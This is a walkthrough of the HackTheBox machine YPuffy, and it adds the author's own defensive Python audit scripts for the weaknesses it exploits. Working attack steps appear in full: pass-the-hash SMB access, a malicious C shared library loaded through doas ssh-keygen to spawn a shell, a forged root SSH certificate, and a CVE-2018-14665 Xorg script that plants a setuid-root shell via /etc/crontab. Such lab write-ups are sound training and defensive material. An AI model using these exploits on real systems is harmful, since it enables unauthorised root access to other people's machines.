
HackTheBox YPuffy Writeup

This writeup covers YPuffy, a medium-difficulty HackTheBox Capture The Flag (CTF) machine. Each step is kept short and the concepts it relies on (anonymous LDAP, SMB with an NT hash, doas rules, SSH certificate authorities) are explained as they come up, so the walkthrough stays accessible to players at this level.

Add Hosts

```
10.10.10.107 ypuffy.htb
```

Script to add hosts automatically

```shell
ip="10.10.10.107"
domain="ypuffy.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
```

Mapping

```shell
nmap -sCV ypuffy.htb
```

```
Nmap scan report for ypuffy.htb (10.10.10.107)
Host is up (0.050s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
|   256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_  256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp  open  http        OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)
Service Info: Host: YPUFFY

Host script results:
| smb2-time: 
|   date: 2024-10-12T07:26:44
|_  start_date: N/A
|_clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -2s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6)
|   Computer name: ypuffy
|   NetBIOS computer name: YPUFFY\x00
|   Domain name: hackthebox.htb
|   FQDN: ypuffy.hackthebox.htb
|_  System time: 2024-10-12T03:26:45-04:00
```
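
The scan above already contains the three things an administrator of this box should have fixed before anyone got to it: an LDAP server that answers anonymous binds, SMB1 signing disabled and SMB2 signing not enforced, and guest access accepted. As an added example (my own code, not part of the original writeup), here is a small Python triage script that reads `nmap -sCV` output and flags those findings. The sample input is a copy of the relevant lines from the scan above; the check list and the severities attached to each finding are my own choices.

```python
import re

# Sample input: the relevant lines of the nmap -sCV output shown above (copied, no network needed).
SAMPLE_SCAN = """\
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 (protocol 2.0)
80/tcp  open  http        OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# One check per line pattern: (regex, severity, finding text). Severities are my own rating.
CHECKS = [
    (re.compile(r"Anonymous bind OK"), "high",
     "LDAP accepts anonymous binds: directory attributes (including password hashes) may be readable by anyone"),
    (re.compile(r"account_used:\s*guest"), "medium",
     "SMB guest/null session accepted: shares and users can be enumerated without credentials"),
    (re.compile(r"message_signing:\s*disabled"), "medium",
     "SMB1 message signing disabled: sessions can be tampered with or relayed"),
    (re.compile(r"Message signing enabled but not required"), "medium",
     "SMB2 signing not required: clients that do not sign are still accepted"),
]


def parse_open_ports(scan_text):
    """Return {port: (service, version)} for every 'open' port line in the scan."""
    ports = {}
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports[int(m.group(1))] = (m.group(3), m.group(4).strip())
    return ports


def triage(scan_text):
    """Run every check over every line; return (severity, text) pairs in scan order, deduplicated."""
    findings = []
    for line in scan_text.splitlines():
        for pattern, severity, text in CHECKS:
            if pattern.search(line) and (severity, text) not in findings:
                findings.append((severity, text))
    return findings


if __name__ == "__main__":
    for port, (service, version) in sorted(parse_open_ports(SAMPLE_SCAN).items()):
        print(f"{port:>5}/tcp {service:<12} {version}")
    for severity, text in triage(SAMPLE_SCAN):
        print(f"[{severity}] {text}")
```

Feed it a saved `nmap -sCV` report (`nmap -oN scan.txt ...`) instead of the sample and it produces the same list; the fixes on the server side are to require authentication for LDAP binds (`olcRequires`/`require authc` or the equivalent for the directory in use), to set `server signing = mandatory` in smb.conf, and to disable guest mapping.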

LDAP and SMB Privilege Escalation on OpenBSD

An Nmap scan shows that LDAP allows anonymous login:

```
389/tcp open  ldap        (Anonymous bind OK)
```

You can refer to HackTricks: Pentesting LDAP for more insights.

LDAP Enumeration and Finding Alice’s Hash

First, enumerate the LDAP service:

```shell
dc=$(ldapsearch -x -H ldap://ypuffy.htb -s base "namingcontexts" | sed -n 's/^.*namingContexts: //p')
ldapsearch -x -H ldap://ypuffy.htb -b "$dc"
```

Alternatively, use Nmap for LDAP enumeration:

```shell
nmap -n -sV --script "ldap* and not brute" ypuffy.htb
```

During the enumeration, you’ll find the sambaNTPassword hash for user alice1978.

Access SMB Shares and Download Private Key

Use Alice’s hash to list SMB shares and download her private key:

```shell
smbmap -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' -H ypuffy.htb -r
smbmap -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' -H ypuffy.htb --download alice/my_private_key.ppk
```

Convert Key to OpenSSH and SSH into the Machine

Convert the .ppk key to OpenSSH format and clean up:

```shell
puttygen 10.10.10.107-alice_my_private_key.ppk -O private-openssh -o alice_private.key
rm -rf 10.10.10.107-alice_my_private_key.ppk
```

Now, SSH into the machine:

```shell
ssh -i alice_private.key alice1978@ypuffy.htb
```

Retrieve the user flag:

```shell
cat user.txt
```

Privilege Escalation via doas

Check the doas configuration:

```shell
cat /etc/doas.conf
```

Alice is allowed to run ssh-keygen as userca:

```
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
```

With this, you can further escalate privileges.
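
The weakness in that second rule is not ssh-keygen itself but the missing `args` clause: doas lets the caller pass any arguments, and ssh-keygen has an option that loads a shared library. As an added example (my own code, not from the writeup), here is a Python audit of doas.conf that parses each rule and reports the usual mistakes: rules with no `cmd` at all, `keepenv`, `nopass`, and a command known to load code that is permitted without an `args` restriction. The list of such commands (`CODE_LOADERS`) is something the reviewer maintains; only ssh-keygen is in it here because that is the case on this box.

```python
from dataclasses import dataclass
from typing import List, Optional, Set

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}

# Commands that can load caller-supplied code when run as another user. Reviewer-maintained;
# ssh-keygen is listed because -D loads a PKCS#11 shared library (the case on this box).
CODE_LOADERS = {"/usr/bin/ssh-keygen": "-D <library> loads a shared object into the process"}


@dataclass
class Rule:
    action: str
    options: Set[str]
    identity: str
    target: Optional[str]   # None means "as root", doas's default
    cmd: Optional[str]      # None means any command
    args: Optional[List[str]]   # None means any arguments
    line: str


def parse_rule(line):
    """Parse one doas.conf rule: permit|deny [options] identity [as target] [cmd command [args ...]]."""
    toks = line.split()
    action, i, opts = toks[0], 1, set()
    while i < len(toks):
        if toks[i] in OPTIONS:
            opts.add(toks[i])
            i += 1
        elif toks[i] == "setenv":          # skip a "{ VAR=value ... }" block
            while i < len(toks) and not toks[i].endswith("}"):
                i += 1
            i += 1
        else:
            break
    identity = toks[i]
    i += 1
    target = cmd = args = None
    if i < len(toks) and toks[i] == "as":
        target = toks[i + 1]
        i += 2
    if i < len(toks) and toks[i] == "cmd":
        cmd = toks[i + 1]
        i += 2
        if i < len(toks) and toks[i] == "args":
            args = toks[i + 1:]        # "args" with nothing after it pins the command to no arguments
    return Rule(action, opts, identity, target, cmd, args, line)


def parse_doas_conf(text):
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            rules.append(parse_rule(line))
    return rules


def audit(rules):
    """Return one finding string per risky property of each permit rule."""
    findings = []
    for r in rules:
        if r.action != "permit":
            continue
        who = f"{r.identity} as {r.target or 'root'}"
        if r.cmd is None:
            findings.append(f"{who}: any command permitted")
        if "keepenv" in r.options:
            findings.append(f"{who}: keepenv passes the caller's environment to the target")
        if "nopass" in r.options:
            findings.append(f"{who}: nopass, no password required")
        if r.cmd in CODE_LOADERS and r.args is None:
            findings.append(f"{who}: {r.cmd} permitted with any arguments; {CODE_LOADERS[r.cmd]}")
    return findings


# Sample input: the two rules read from /etc/doas.conf on the box above.
SAMPLE_DOAS_CONF = """\
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
"""

if __name__ == "__main__":
    for finding in audit(parse_doas_conf(SAMPLE_DOAS_CONF)):
        print(finding)
```

The fix the audit points at is to append an `args` clause listing the exact arguments the delegated task needs; doas then rejects any other invocation, including `-D`, before it ever runs ssh-keygen as userca.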


SSH-Keygen Privilege Escalation

Using information from GTFOBins: ssh-keygen, we can exploit the ability to load arbitrary libraries as userca. While switching to userca isn’t strictly necessary, I did so to explore and test shell payloads in .so libraries.

```shell
cd /tmp
nano poc.c
gcc -shared -fPIC -o lib.so poc.c
```
```c
#include <stdio.h>
#include <unistd.h>

#define SHELL_PATH "/bin/sh"
#define SHELL_COMMAND "/bin/sh"

/* Runs as soon as the shared object is loaded (here by ssh-keygen -D),
 * before any PKCS#11 symbol is looked up. */
void __attribute__ ((constructor)) constructor()
{
    puts("[starting shell]");
    printf("Starting %s\n", SHELL_COMMAND);
    /* execl replaces the process; it only returns (with -1) if the exec failed */
    int err = execl(SHELL_PATH, SHELL_PATH, "-c", SHELL_COMMAND, NULL);
    printf("Result: %d\n", err);
}
```

Next, use ssh-keygen to load the malicious library:

```shell
doas -u userca /usr/bin/ssh-keygen -D ./lib.so
```

Now, we have escalated privileges to userca:

```
ypuffy$ id
uid=1001(userca) gid=1001(userca) groups=1001(userca)
```
```shell
cat /etc/ssh/sshd_config
```

The daemon configuration (these are sshd_config directives, not client settings) contains AuthorizedKeysCommand, AuthorizedPrincipalsCommand, and TrustedUserCAKeys /home/userca/ca.pub. Together they show that a Certificate Authority (CA) is in place for SSH authentication: sshd accepts any user certificate signed by the key matching ca.pub, for whichever principals the AuthorizedPrincipalsCommand returns for the login name.

```shell
cd /home/userca/.ssh
ssh-keygen -t ecdsa
/usr/bin/ssh-keygen -s /home/userca/ca -I alice1978 -n "$(curl -s "http://127.0.0.1/sshauth?type=principals&username=root")" -z 1 id_ecdsa.pub
ssh -i id_ecdsa root@localhost
```

```shell
cat /root/root.txt
```
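
What made the last step possible is that the CA private key was usable by a non-root account, so a certificate could be minted with key id `alice1978`, the `root` principal, serial 1 and no validity window. Those are exactly the fields a defender inspects (`ssh-keygen -L -f id_ecdsa-cert.pub` prints them) and revokes by serial through a KRL. As an added example (my own code, not from the writeup or from OpenSSH), here is a Python parser for the OpenSSH certificate blob that extracts key id, principals, serial and validity, plus an audit that flags a certificate of the kind forged above. The `build_demo_cert` helper constructs an unsigned ecdsa-sha2-nistp256 certificate purely so the parser has input; the rule that the key id must equal the principal is a policy assumption for a deployment where the key id records the requesting account.

```python
import base64
import struct

FOREVER = 0xFFFFFFFFFFFFFFFF      # valid_before written by ssh-keygen -s when no -V is given
CERT_TYPE_USER = 1
# Number of key-specific strings that follow the nonce, per certificate type.
KEY_FIELDS = {
    "ssh-rsa-cert-v01@openssh.com": 2,                 # e, n
    "ecdsa-sha2-nistp256-cert-v01@openssh.com": 2,     # curve name, point
    "ecdsa-sha2-nistp384-cert-v01@openssh.com": 2,
    "ecdsa-sha2-nistp521-cert-v01@openssh.com": 2,
    "ssh-ed25519-cert-v01@openssh.com": 1,             # pk
}


def _string(b):
    return struct.pack(">I", len(b)) + b


def _read_string(buf, off):
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    return buf[off:off + n], off + n


def build_demo_cert(key_id, principals, serial, valid_after=0, valid_before=FOREVER):
    """Construct an UNSIGNED ecdsa-sha2-nistp256 user certificate blob (demo input only)."""
    blob = _string(b"ecdsa-sha2-nistp256-cert-v01@openssh.com")
    blob += _string(b"\x00" * 32)                        # nonce (constructed)
    blob += _string(b"nistp256")
    blob += _string(b"\x04" + b"\x00" * 64)              # public point (constructed placeholder)
    blob += struct.pack(">QI", serial, CERT_TYPE_USER)
    blob += _string(key_id.encode())
    blob += _string(b"".join(_string(p.encode()) for p in principals))
    blob += struct.pack(">QQ", valid_after, valid_before)
    blob += _string(b"") * 3                              # critical options, extensions, reserved
    blob += _string(b"") + _string(b"")                   # signature key, signature (empty: unsigned)
    return blob


def parse_cert(blob):
    """Decode the fields of an OpenSSH *-cert-v01 blob up to the validity window."""
    off = 0
    kind, off = _read_string(blob, off)
    kind = kind.decode()
    _nonce, off = _read_string(blob, off)
    for _ in range(KEY_FIELDS[kind]):                     # skip the embedded public key
        _part, off = _read_string(blob, off)
    serial, ctype = struct.unpack_from(">QI", blob, off)
    off += 12
    key_id, off = _read_string(blob, off)
    plist, off = _read_string(blob, off)
    principals, p = [], 0
    while p < len(plist):
        name, p = _read_string(plist, p)
        principals.append(name.decode())
    valid_after, valid_before = struct.unpack_from(">QQ", blob, off)
    return {"type": kind, "serial": serial, "user_cert": ctype == CERT_TYPE_USER,
            "key_id": key_id.decode(), "principals": principals,
            "valid_after": valid_after, "valid_before": valid_before}


def load_cert_line(line):
    """Parse one line of an id_*-cert.pub file: '<type> <base64 blob> [comment]'."""
    return parse_cert(base64.b64decode(line.split()[1]))


def audit_cert(cert):
    """Policy checks (assumed policy: key id names the account the cert was issued to)."""
    findings = []
    for principal in cert["principals"]:
        if principal != cert["key_id"]:
            findings.append(f"principal '{principal}' does not match key id '{cert['key_id']}'")
    if "root" in cert["principals"]:
        findings.append("certificate grants the root principal")
    if cert["valid_before"] == FOREVER:
        findings.append("no expiry: certificate is valid forever (signed without -V)")
    return findings


if __name__ == "__main__":
    forged = build_demo_cert("alice1978", ["root"], 1)        # shape of the cert minted above
    line = "ecdsa-sha2-nistp256-cert-v01@openssh.com " + base64.b64encode(forged).decode() + " demo"
    cert = load_cert_line(line)
    print(cert)
    for finding in audit_cert(cert):
        print("!", finding)
```

On a real host the same parser works on `~/.ssh/id_ecdsa-cert.pub` and on certificates logged by sshd; the mitigations are to keep the CA private key off the server that trusts it (or at least root-only), always sign with `-V` to bound validity, and keep a `RevokedKeys` KRL so a certificate like the one above can be revoked by its serial.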

CVE-2018-14665 Exploitation on OpenBSD

Alternative Privilege Escalation

To verify the system version, run:

```shell
uname -a
```

Example output:

```
OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64
```

This version, OpenBSD 6.3, ships an Xorg affected by CVE-2018-14665: the setuid X server did not check who was calling it before honouring the -modulepath and -logfile options, so an unprivileged local user can make it write its log file to an arbitrary path, here /etc/crontab, and escalate to root.

For detailed exploitation steps, refer to the Exploit-DB entry.

```shell
cat << EOF > /tmp/xorgasm
cp /bin/sh /usr/local/bin/pwned
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/xorgasm
cd /etc
Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 &
sleep 5
pkill Xorg
echo
echo "Be patient for a couple of minutes..."
echo
sleep 120
echo
echo "Don't forget to cleanup and run crontab -e to reload the crontab."
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
/usr/local/bin/pwned
```
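
The exploit leaves two artifacts behind: a crontab that is mostly X server log text with one job pointing into /tmp, and a setuid root shell in /usr/local/bin with mode 4777. As an added example (my own code, not from the writeup or the Exploit-DB entry), here is a Python check for both: the first function walks a crontab in the five-field-plus-user format the script writes and flags lines that are not cron entries at all (a sign the file was overwritten by another program) and jobs that run out of a world-writable directory; the second flags setuid files that are world-writable or absent from a baseline list. The sample crontab is constructed, with lines written in the style of an Xorg log; the file entries and the baseline are constructed as well.

```python
import re
from stat import S_ISUID, S_IWOTH

CRON_FIELD = r"[\w*,/\-]+"              # minute hour dom month dow: digits, names, * , / -
CRON_LINE = re.compile(r"^(?:" + r"\s+".join([CRON_FIELD] * 5) + r"|@\w+)\s+(\S+)\s+(.+)$")
ENV_LINE = re.compile(r"^[A-Za-z_]\w*=")
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def audit_system_crontab(text):
    """Return (line number, finding) pairs for a system crontab (fields, user, command)."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        m = CRON_LINE.match(line)
        if not m:
            findings.append((no, "not a crontab entry; file may have been overwritten by another program"))
            continue
        user, command = m.group(1), m.group(2)
        if command.startswith(WORLD_WRITABLE_DIRS):
            findings.append((no, f"job runs {command} as {user} from a world-writable directory"))
    return findings


def audit_setuid(entries, baseline):
    """entries: (mode, owner, path) tuples as os.stat would give them; baseline: expected setuid paths."""
    findings = []
    for mode, owner, path in entries:
        if not mode & S_ISUID:
            continue
        if mode & S_IWOTH:
            findings.append(f"{path}: setuid and world-writable (mode {mode & 0o7777:04o})")
        elif path not in baseline:
            findings.append(f"{path}: setuid binary owned by {owner} not in baseline")
    return findings


# Constructed sample: a legitimate crontab header and job, then lines in the style of an Xorg
# log, then the job the exploit plants.
SAMPLE_CRONTAB = """\
# constructed sample crontab
SHELL=/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin
30 1 * * * root /bin/sh /etc/daily
[    42.123] (==) Log file: "crontab", Time: Sat Oct 12 03:26:45 2024
[    42.123] (==) Using config directory: "/etc/X11/xorg.conf.d"
* * * * * root /tmp/xorgasm
"""

# Constructed file listing: (mode, owner, path); only the first is the exploit's artifact.
SAMPLE_FILES = [
    (0o104777, "root", "/usr/local/bin/pwned"),
    (0o104555, "root", "/usr/bin/doas"),
    (0o104755, "root", "/usr/local/bin/unexpected"),
    (0o100755, "root", "/usr/local/bin/ordinary"),
]
SAMPLE_BASELINE = {"/usr/bin/doas"}

if __name__ == "__main__":
    for no, finding in audit_system_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {no}: {finding}")
    for finding in audit_setuid(SAMPLE_FILES, SAMPLE_BASELINE):
        print(finding)
```

To run it against a live system, read the real crontab text and build the entries list with `os.lstat` over the directories of interest (`find / -perm -4000` gives the same candidate set); the baseline is whatever the package manager installed, which is why an unexpected setuid file under /usr/local/bin is worth a look even when its mode looks sane.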
This post is licensed under CC BY 4.0 by the author.